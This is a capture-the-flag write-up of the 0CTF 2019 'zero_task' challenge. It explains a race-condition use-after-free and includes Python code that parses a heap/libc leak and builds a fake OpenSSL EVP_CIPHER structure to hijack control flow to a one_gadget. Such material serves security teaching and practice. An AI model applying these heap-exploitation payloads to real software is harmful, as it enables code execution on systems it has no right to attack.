0CTF 2019 zero_task: exploiting a race condition - vulnerability warning - the black bar safety net

ID MYHACK58:62201993369
Type myhack58
Reporter Anonymous (佚名)
Modified 2019-03-28T00:00:00


  1. Foreword

  zero_task was the easiest of the pwn challenges at 0CTF 2019. The vulnerability type is a race condition.

  2. Protections

  All protections are enabled.

  3. Program functionality

  The program implements encryption and decryption tasks and exposes three functions.

  4. The three functions: 1. Create task, 2. Delete task, 3. Execute task.

  a. Create task

  This function allocates a 0x80-sized chunk for a task structure. Tentatively calling it task, the layout recovered in the writeup is: +0x00 data, +0x08 data_size, +0x14 KEY, +0x34 IV, ..., +0x58 EVP_CIPHER_CTX, +0x60 task_id, +0x68 pointer to the next task (the tasks form a singly linked list).

  The user supplies task_id, whether to encrypt or decrypt, KEY (32 bytes), IV (16 bytes), DATA_SIZE (the length of the data to encrypt or decrypt) and DATA. A buffer of DATA_SIZE bytes is malloc'd for the data, and EVP_CIPHER_CTX_new() creates an EVP_CIPHER_CTX object. Feature 1: creating a task allocates four heap chunks, in this order: the 0x80 task structure, the 0xb0 EVP_CIPHER_CTX object, a 0x110 chunk allocated while the EVP_CIPHER_CTX is initialised (OpenSSL's cipher-specific context data), and the DATA_SIZE buffer.

  b. Delete task

  Finds the task with the given task_id in the singly linked list, unlinks it and frees it.

  c. Execute task

  Finds the task structure with the given task_id and, in a new thread, performs the encryption or decryption it describes. The output is written to a heap chunk allocated in advance and then printed. The function may be called at most three times. The thread calls sleep(2) right after it starts, which is an obvious race condition: the task can be deleted while the thread still holds a pointer to it.

  5. Address leak

  The race condition is used to leak addresses. The execute-task thread receives the address of the task structure as its argument. The idea: free task2 in advance, then call function 3 to encrypt task1. While the thread sleeps, free task1. task1's structure goes into the tcache list, and its +0x00 field (the data pointer) is overwritten with the tcache next pointer, which points to the task2 structure freed earlier. If task1's DATA_SIZE is large enough, the thread then encrypts, starting at task2's structure, the structure itself, the EVP_CIPHER_CTX object, the 0x110 chunk created with it and the buffer allocated for task2's DATA_SIZE, and prints all of it. Creating a new task with the same key (and IV) to decrypt that output yields the leaked addresses. Difficulties and how to overcome them:

  6. The program runs against libc 2.27, which has tcache. For the leak we need the task structure to be freed into the tcache list (giving a heap pointer) and the DATA_SIZE buffer to be freed into the unsorted bin (giving a libc pointer). Since there is only one chance to leak, both the heap address and the libc address must come out of it. Allocation method: set DATA_SIZE to 0x110, the same chunk size as the 0x110 chunk created with the EVP_CIPHER_CTX object, create 4 tasks and then free them. This releases 4 chunks of size 0x80 and 8 chunks of size 0x110; tcache holds at most 7 chunks per size class, so the eighth 0x110 chunk lands in the unsorted bin.
  7. In the example above, freeing task1 also frees its EVP_CIPHER_CTX object, so the encryption fails, and re-creating a task would cause task1's structure to be malloc'd again. Workaround: free(1), free(2), free(3), add(0xa0), add(0x8). The EVP_CIPHER_CTX object is a 0xb0 chunk, and the two additions consume 2 structures of 0x80 and 3 chunks of 0xb0 (two EVP_CIPHER_CTX objects plus the 0xa0 data buffer, which is served from a 0xb0 chunk). This way task1's structure is not re-malloc'd while the EVP_CIPHER_CTX object it points to is re-created. EVP_CipherUpdate is the encryption function: rdi is the EVP_CIPHER_CTX object, rcx the heap chunk holding the data to encrypt, r8 the size. The data being encrypted already contains heap and libc addresses.
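The following is an added example (not code from the original writeup) of the exploit-side parsing of the decrypted leak described in sections 5 to 7. It assumes the four chunks of task2 lie back to back with the sizes given above (0x80 task struct, 0xb0 EVP_CIPHER_CTX, 0x110 cipher data, 0x110 DATA buffer), that the leak starts at task2's user pointer, and that the DATA buffer is the only chunk in the unsorted bin. UNSORTED_HEAD_OFF is an assumption for the target libc 2.27 build, and the sample blob is constructed, not captured from the challenge.

```python
import struct

# Chunk sizes as recovered in the writeup (glibc 2.27, 64-bit).  All four are
# allocated back to back, so the user pointer of each chunk lies exactly one
# chunk size after the previous one.
TASK_CHUNK, CTX_CHUNK, CIPHER_DATA_CHUNK, DATA_CHUNK = 0x80, 0xb0, 0x110, 0x110

OFF_TASK = 0x0                                   # task2 struct (leak starts here)
OFF_CTX = OFF_TASK + TASK_CHUNK                  # 0x80  freed EVP_CIPHER_CTX
OFF_CIPHER_DATA = OFF_CTX + CTX_CHUNK            # 0x130 freed cipher data
OFF_DATA = OFF_CIPHER_DATA + CIPHER_DATA_CHUNK   # 0x240 freed DATA buffer
LEAK_LEN = OFF_DATA + 0x10                       # covers fd and bk of the DATA chunk

# ASSUMPTION: distance from the libc base to the unsorted-bin list head
# (main_arena+0x58).  Adjust this for the target's libc-2.27.so.
UNSORTED_HEAD_OFF = 0x3ebca0


def u64(b):
    return struct.unpack("<Q", b)[0]


def p64(v):
    return struct.pack("<Q", v)


def parse_leak(blob, unsorted_head_off=UNSORTED_HEAD_OFF):
    """Extract a heap pointer and the libc base from the decrypted leak.

    Every freed chunk in a tcache list has its 'next' pointer (a heap address)
    in the first qword of its user data; for task2 that qword is the 'data'
    field at +0x00.  The DATA buffer sits in the unsorted bin, so its first two
    qwords are fd/bk pointing into main_arena, i.e. into libc.
    """
    if len(blob) < LEAK_LEN:
        raise ValueError("leak too short: need 0x%x bytes, got 0x%x" % (LEAK_LEN, len(blob)))

    # Sanity-check the chunk size fields (8 bytes before each user pointer)
    # before trusting any pointer: a mismatch means the layout is not the one
    # assumed above and the "pointers" would be garbage.
    for off, size in ((OFF_CTX, CTX_CHUNK), (OFF_CIPHER_DATA, CIPHER_DATA_CHUNK), (OFF_DATA, DATA_CHUNK)):
        hdr = u64(blob[off - 8:off]) & ~0x7
        if hdr != size:
            raise ValueError("unexpected chunk size 0x%x at +0x%x (expected 0x%x)" % (hdr, off, size))

    # The first chunk freed into a tcache bin has next == NULL, so try each of
    # the three tcache'd chunks and take the first non-zero link.
    heap_ptr = 0
    for off in (OFF_TASK, OFF_CTX, OFF_CIPHER_DATA):
        heap_ptr = u64(blob[off:off + 8])
        if heap_ptr:
            break
    if heap_ptr == 0 or heap_ptr & 0xf:
        raise ValueError("no usable tcache next pointer in the leak")

    fd = u64(blob[OFF_DATA:OFF_DATA + 8])
    bk = u64(blob[OFF_DATA + 8:OFF_DATA + 16])
    if fd == 0 or fd != bk:       # a lone unsorted-bin chunk has fd == bk == bin head
        raise ValueError("DATA chunk does not look like the only unsorted-bin entry")
    libc_base = fd - unsorted_head_off
    if libc_base & 0xfff:
        raise ValueError("libc base 0x%x not page aligned; wrong unsorted_head_off?" % libc_base)
    return {"heap_ptr": heap_ptr, "libc_base": libc_base}


def build_sample_leak(heap_ptr, libc_base, heap_slot=OFF_TASK, unsorted_head_off=UNSORTED_HEAD_OFF):
    """Constructed stand-in for the decrypted output of the leaking task (NOT
    captured from the challenge): zero-filled except for the chunk headers and
    the freed-chunk link pointers that parse_leak() relies on."""
    blob = bytearray(LEAK_LEN)
    blob[heap_slot:heap_slot + 8] = p64(heap_ptr)                # a tcache 'next' link
    for off, size in ((OFF_CTX, CTX_CHUNK), (OFF_CIPHER_DATA, CIPHER_DATA_CHUNK), (OFF_DATA, DATA_CHUNK)):
        blob[off - 8:off] = p64(size | 1)                        # size | PREV_INUSE
    head = libc_base + unsorted_head_off
    blob[OFF_DATA:OFF_DATA + 16] = p64(head) + p64(head)         # unsorted-bin fd/bk
    return bytes(blob)


if __name__ == "__main__":
    sample = build_sample_leak(0x5555555592c0, 0x7ffff79e4000)  # constructed addresses
    print({k: hex(v) for k, v in parse_leak(sample).items()})
```

The header checks are the part worth keeping in a real script: when the tcache or unsorted-bin placement differs from the plan (for example because a chunk consolidated with the top chunk), the size fields will not match and it is better to fail loudly than to compute a libc base from a NULL or a stale pointer.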

  8. Code execution

  With the libc address known we need a way to redirect control flow to a one_gadget, but the program offers no function that writes to an attacker-chosen address: encrypted and decrypted data are always placed in a pre-allocated heap chunk, and the race condition by itself does not help us write to an address. Following the encryption function EVP_CipherUpdate, it decides between encryption and decryption from the field at EVP_CIPHER_CTX+0x10. I chose to follow the encryption path, EVP_EncryptUpdate. Inside it there is an indirect call: EVP_CIPHER_CTX+0x00 holds a pointer to a structure, arbitrarily named E here (it is the EVP_CIPHER), and the program calls the function pointer at E+0x20 provided that the instruction test byte ptr [E+0x12], 0x10 finds the bit set. (In OpenSSL 1.1.x, E+0x10 is the cipher's flags field, bit 0x10 of its byte +0x12 is the flag value 0x100000, EVP_CIPH_FLAG_CUSTOM_CIPHER, and E+0x20 is the do_cipher pointer.) The exploitation method is then clear at a glance: use the race condition to re-allocate the EVP_CIPHER_CTX object so that its E pointer points to a heap chunk we control, lay out that chunk so that [E+0x12] has bit 0x10 set and [E+0x20] points to the one_gadget, and the indirect call completes the exploit. Sequence: free(1), free(2), add(0xa0).
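As an added example (not code from the original writeup), this builds the 0xa0-byte DATA for the final add(0xa0): the buffer is served from a 0xb0 chunk and so reoccupies the freed EVP_CIPHER_CTX of task1, and the fake EVP_CIPHER is placed inside the same buffer so its address is known from the heap leak. The EVP_CIPHER_CTX / EVP_CIPHER field offsets are those of OpenSSL 1.1.x on 64-bit; FAKE_CIPHER_OFF, the chunk address and the one_gadget address are assumptions. dispatch_target() is a small model of only the checks the writeup names on the EVP_CipherUpdate path, used here to verify the payload offline; it is not OpenSSL code.

```python
import struct


def p32(v):
    return struct.pack("<I", v)


def p64(v):
    return struct.pack("<Q", v)


def u64(b):
    return struct.unpack("<Q", b)[0]


# OpenSSL 1.1.x, 64-bit layouts touched on the path described in the writeup:
#   struct evp_cipher_ctx_st: +0x00 cipher (EVP_CIPHER *), +0x08 engine, +0x10 encrypt (int)
#   struct evp_cipher_st:     +0x00 nid, +0x04 block_size, +0x08 key_len, +0x0c iv_len,
#                             +0x10 flags (unsigned long), +0x18 init, +0x20 do_cipher
CTX_CIPHER, CTX_ENCRYPT = 0x00, 0x10
CIPHER_FLAGS, CIPHER_DO_CIPHER = 0x10, 0x20
EVP_CIPH_FLAG_CUSTOM_CIPHER = 0x100000   # bit 0x10 of the byte at flags+2, i.e. [E+0x12]

DATA_SIZE = 0xa0        # add(0xa0): malloc(0xa0) is served from the freed 0xb0 ctx chunk
FAKE_CIPHER_OFF = 0x40  # ASSUMPTION: where inside that buffer the fake EVP_CIPHER is placed


def fake_evp_cipher(do_cipher):
    """Fake struct evp_cipher_st whose only live fields are flags and do_cipher."""
    e = p32(0) + p32(16) + p32(32) + p32(16)    # nid, block_size, key_len, iv_len
    e += p64(EVP_CIPH_FLAG_CUSTOM_CIPHER)       # flags: take the custom-cipher branch
    e += p64(0)                                 # init: never reached on this path
    e += p64(do_cipher)                         # do_cipher -> one_gadget
    return e


def build_ctx_payload(chunk_addr, one_gadget):
    """DATA for add(0xa0).  Its bytes become the EVP_CIPHER_CTX fields that
    task1's sleeping thread will read: the cipher pointer at +0x00 points at
    the fake EVP_CIPHER further inside the same buffer (chunk_addr + FAKE_CIPHER_OFF)
    and encrypt at +0x10 is non-zero so EVP_CipherUpdate takes the encryption path."""
    buf = bytearray(DATA_SIZE)
    buf[CTX_CIPHER:CTX_CIPHER + 8] = p64(chunk_addr + FAKE_CIPHER_OFF)
    buf[CTX_ENCRYPT:CTX_ENCRYPT + 4] = p32(1)
    fake = fake_evp_cipher(one_gadget)
    buf[FAKE_CIPHER_OFF:FAKE_CIPHER_OFF + len(fake)] = fake
    return bytes(buf)


def dispatch_target(mem, ctx_addr):
    """Model of the checks the writeup identifies (not OpenSSL code): returns
    the address that would be called through [E+0x20], or None if that call
    is not reached.  `mem` maps a base address to the bytes stored there."""
    def read(addr, n):
        for base, data in mem.items():
            if base <= addr and addr + n <= base + len(data):
                return data[addr - base:addr - base + n]
        raise KeyError("unmapped read at 0x%x" % addr)

    if struct.unpack("<i", read(ctx_addr + CTX_ENCRYPT, 4))[0] == 0:
        return None                                   # decryption path instead
    e = u64(read(ctx_addr + CTX_CIPHER, 8))
    if not read(e + CIPHER_FLAGS + 2, 1)[0] & 0x10:   # test byte ptr [E+0x12], 0x10
        return None
    return u64(read(e + CIPHER_DO_CIPHER, 8))


if __name__ == "__main__":
    chunk = 0x5555555593e0                   # constructed: freed ctx chunk, from the heap leak
    one_gadget = 0x7ffff79e4000 + 0x4f322    # constructed: libc base + a one_gadget offset
    payload = build_ctx_payload(chunk, one_gadget)
    print(hex(dispatch_target({chunk: payload}, chunk)))
```

Pointing the cipher field back into the same chunk is what makes this workable with a single leak: the fake EVP_CIPHER needs an address, and the address of the reallocated ctx chunk is already known relative to the heap pointer leaked earlier, so no second controlled allocation is needed.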
